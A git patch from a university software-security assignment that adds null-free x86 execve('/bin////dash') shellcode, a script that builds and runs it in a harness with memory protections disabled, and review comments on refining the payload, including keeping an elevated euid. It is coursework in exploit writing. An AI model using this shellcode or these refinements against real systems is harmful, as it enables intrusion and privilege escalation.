From 66487892604269aaf18d2e1756a918de3cb90d22 Mon Sep 17 00:00:00 2001
From: Sascha Tommasone
Date: Sat, 8 Jun 2024 18:19:10 +0200
Subject: [PATCH] [Assignment-5] added solution task 3 (shellcode)
---
 .../shellcode/exploit | 16 ++++++++++++
 .../shellcode/shellcode.asm | 26 +++++++++++++++----
 2 files changed, 37 insertions(+), 5 deletions(-)
 create mode 100755 Assignment 5 - Software Security - Teil 1/shellcode/exploit
diff --git a/Assignment 5 - Software Security - Teil 1/shellcode/exploit b/Assignment 5 - Software Security - Teil 1/shellcode/exploit
new file mode 100755
index 0000000..d67b812
--- /dev/null
+++ b/Assignment 5 - Software Security - Teil 1/shellcode/exploit
@@ -0,0 +1,16 @@
+#!/bin/bash
+
+# assemble shellcode
+nasm -felf32 shellcode.asm -o x.o && ld -m elf_i386 x.o -o shellcode &> /dev/null
+
+# remove object file
+rm x.o
+
+# extract shellcode and remove binary
+shellcode=$(for byte in $(objdump -d ./shellcode | grep "^ " | cut -f2); do echo -n '\x'$byte; done)
+rm shellcode
+
+# TODO place shellcode into test_shellcode.c and shellcode.asm
+
+# compile test_shellcode.c and execute it afterwards
+gcc -o test_shellcode -m32 -fno-stack-protector -fno-pie -z execstack -O0 test_shellcode.c && ./test_shellcode
diff --git a/Assignment 5 - Software Security - Teil 1/shellcode/shellcode.asm b/Assignment 5 - Software Security - Teil 1/shellcode/shellcode.asm
index 310f6cf..273cc01 100644
--- a/Assignment 5 - Software Security - Teil 1/shellcode/shellcode.asm
+++ b/Assignment 5 - Software Security - Teil 1/shellcode/shellcode.asm
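Review bot: Nothing stops the pipeline on failure: without `set -euo pipefail` a nasm error still runs `rm x.o` and then `objdump -d ./shellcode` against a missing or stale binary, and the `&> /dev/null` on the ld step hides the one message that would explain what went wrong. The extracted `$shellcode` is also never checked for `\x00` bytes or printed, so the manual TODO step has nothing to paste and a payload later delivered through a C string routine could be silently truncated without anyone noticing. Add `set -euo pipefail` after the shebang and, right after the extraction, `[[ $shellcode == *'\x00'* ]] && { echo "NUL byte in shellcode" >&2; exit 1; }` followed by `echo "$shellcode"`. The `grep "^ " | cut -f2` extraction depends on objdump's tab-separated listing layout; `objcopy -O binary -j .text shellcode shellcode.bin` followed by `xxd -p` would read the bytes directly and not depend on that formatting.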
@@ -1,8 +1,24 @@ -; SHELLCODE: "\x90\x90\x90..." +; SHELLCODE: "\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80" -global _start +section .text + global _start + +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +; https://rayoflightz.github.io/shellcoding/linux/x86/2018/11/15/Shellcoding-for-linux-on-x86.html ; +; https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md#x86-32_bit ; +; https://man7.org/linux/man-pages/man2/execve.2.html ; +; https://www.ascii-code.com/ ; +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; _start: - ;---------------------------------- - nop; - ; ------------ End of file ------------ + xor eax, eax ; set eax to NULL without terminating the shellcode later + push eax ; push a null byte onto the stack as the string terminator + push 0x68736164 ; push the ASCII values for 'dash' onto the stack in reverse order (due to little endian) + push 0x2f2f2f2f ; push the ASCII values for '////' onto the stack in reverse order " + push 0x6e69622f ; push the ASCII values for '/bin' onto the stack in reverse order " + mov ebx, esp ; set ebx to the address of the '/bin////dash' string (top of the stack) + mov ecx, eax ; set ecx to NULL (=> char *const _Nullable argv[] is NULL) + mov edx, eax ; set edx to NULL (=> char *const _Nullable envp[] is NULL) + mov al, 0xb ; load the syscall number for execve (11) into lowest 8 bits of eax to prevent null bytes in shellcode + int 0x80 ; trigger the kernel interrupt to execute the syscall +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
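Review bot: `mov ecx, eax` passes argv as NULL, which Linux accepts but man 2 execve marks as non-standard, and it starts dash with argc == 0, a known trap for the exec'd program; a real argv costs three null-free instructions, so replace that line with `push eax ; argv[1] = NULL`, `push ebx ; argv[0] -> "/bin////dash"`, `mov ecx, esp ; ecx = argv` and regenerate the SHELLCODE string in the header comment with the exploit script afterwards. The comment on `push eax` says it pushes "a null byte", but it pushes a four-byte zero dword; say so, because the point is that this terminator plus the three 4-byte pushes build the path without a single 0x00 byte appearing in the code. `0xb` should be named, e.g. `SYS_EXECVE equ 11` above `_start`, and the header comment would serve a reader better by stating the invariant the whole block is built around, `; invariant: no 0x00 byte anywhere (eax zeroed via xor, syscall number loaded through al)`, than by listing URLs. If dash was chosen over sh or bash because bash drops an elevated euid unless started with `-p`, say so in a comment next to the push sequence; otherwise the choice reads as arbitrary.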